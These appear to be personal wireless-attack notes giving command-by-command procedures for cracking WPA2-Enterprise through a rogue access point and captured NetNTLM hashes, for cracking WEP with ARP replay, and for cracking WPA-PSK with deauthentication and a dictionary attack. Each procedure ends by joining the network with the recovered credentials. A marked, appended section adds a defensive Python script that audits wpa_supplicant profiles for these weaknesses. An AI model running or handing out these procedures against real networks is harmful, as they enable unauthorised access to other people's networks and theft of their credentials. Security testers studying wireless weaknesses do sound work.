Wireless attacks notes
CRACKING WPA ENTERPRISE
https://systemweakness.com/defeating-wpa2-enterprise-peap-authentication-418829b8922c
1.airmon-ng start wlan0
2.airodump-ng wlan0mon
3.airmon-ng stop wlan0mon
4.nano hostapd-wpe.conf
We can also use /etc/hostapd-wpe/hostapd-wpe.conf
5.mousepad /etc/hostapd-wpe/hostapd-wpe.eap_user -- next we check this file
* PEAP,TTLS,TLS,FAST
"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "pass" [2]
6.hostapd-wpe hostapd-wpe.conf -- then we start hostapd and, after waiting a while, we obtain the hash: we capture the NTLM hash
7.john --format=netntlm --wordlist=/usr/share/john/password.lst --rules <hash_file> -- with this we crack the hash
  john --show --format=netntlm <hash_file>
8.mousepad filename.conf -- then we write the following into the configuration file
network={
ssid="<ESSID>"
scan_ssid=1
key_mgmt=WPA-EAP
eap=PEAP
identity="domainname\username"
password="crackedpassword"
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}
10.sudo wpa_supplicant -i wlan0 -c filename.conf -- we start this to connect to the AP
11.dhclient -v wlan0 -- we are connected to the internet!
CRACKING WEP
1.airmon-ng start wlan0
  airodump-ng wlan0mon
2.airodump-ng -c <channel> -w filename wlan0mon
3.aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx wlan0mon -- we perform an ARP replay attack
4.aircrack-ng filename.cap
5.nano filename.conf
network={
ssid="<ESSID>"
key_mgmt=NONE
wep_key0=<hex key, without colons or double quotes>
wep_tx_keyidx=0
}
6.wpa_supplicant -i wlan0 -c filename.conf -B -- connect to the AP
7.dhclient -v wlan0 -- we are connected to the internet!
CRACKING WPA-PSK
1.airmon-ng start wlan0
  airodump-ng wlan0mon
2.airodump-ng -c <channel> -w filename wlan0mon
3.aireplay-ng -0 2 -a XX:XX:XX:XX:XX:XX wlan0mon
4.aircrack-ng filename.cap -w /usr/share/john/password.lst -0
5.nano filename.conf
network={
ssid="<ESSID>"
scan_ssid=1
psk="crackedpassword"
key_mgmt=WPA-PSK
}
6.airmon-ng stop wlan0mon
  wpa_supplicant -i wlan0 -c filename.conf
7.dhclient -v wlan0 -- we are connected to the internet!
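Seen from the defender's side, the three client profiles above have settings that can be checked for. The following is an added example, not part of the original notes: a short Python audit of a wpa_supplicant configuration that flags WPA-EAP profiles without RADIUS certificate validation, WEP keys and WPA-PSK. The SSIDs, file path and server name in the sample are constructed placeholders, and parse_networks, audit and audit_config are names chosen here.

```python
import re

# Constructed sample (placeholder SSIDs, path, server name): the three profile
# shapes from the notes plus one WPA-EAP profile that pins the RADIUS server.
SAMPLE = """
network={
  ssid="corp"
  key_mgmt=WPA-EAP
  eap=PEAP
}
network={
  ssid="lab"
  key_mgmt=NONE
  wep_key0=0102030405
}
network={
  ssid="home"
  key_mgmt=WPA-PSK
  psk="crackedpassword"
}
network={
  ssid="corp-pinned"
  key_mgmt=WPA-EAP
  ca_cert="/etc/ssl/certs/example-ca.pem"
  domain_suffix_match="radius.example.com"
}
"""
NAME_CHECKS = ("domain_match", "domain_suffix_match", "altsubject_match", "subject_match")

def parse_networks(text):
    """Return one {key: value} dict per network={...} block ('#' lines are skipped)."""
    bodies = re.findall(r"network=\{(.*?)\}", text, re.S)
    pairs = [re.findall(r"^[ \t]*(\w+)=(.*)$", b, re.M) for b in bodies]
    return [{k: v.strip().strip('"') for k, v in p} for p in pairs]

def audit(net):
    """List the weaknesses in one profile that the procedures above depend on."""
    out, km = [], net.get("key_mgmt", "")
    if "WPA-EAP" in km and not ("ca_cert" in net or "ca_path" in net):
        out.append("no ca_cert/ca_path: server certificate is not verified")
    if "WPA-EAP" in km and not any(k in net for k in NAME_CHECKS):
        out.append("no domain/subject match: server name is not checked")
    if km == "NONE" and any(k.startswith("wep_key") for k in net):
        out.append("WEP: key is recoverable from captured traffic")
    if "WPA-PSK" in km:
        out.append("WPA-PSK: a captured handshake allows offline passphrase guessing")
    return out

def audit_config(text):
    return {n.get("ssid", "?"): audit(n) for n in parse_networks(text)}
```

audit_config(SAMPLE) returns a dict keyed by SSID; only the profile with both ca_cert and domain_suffix_match set comes back with an empty list.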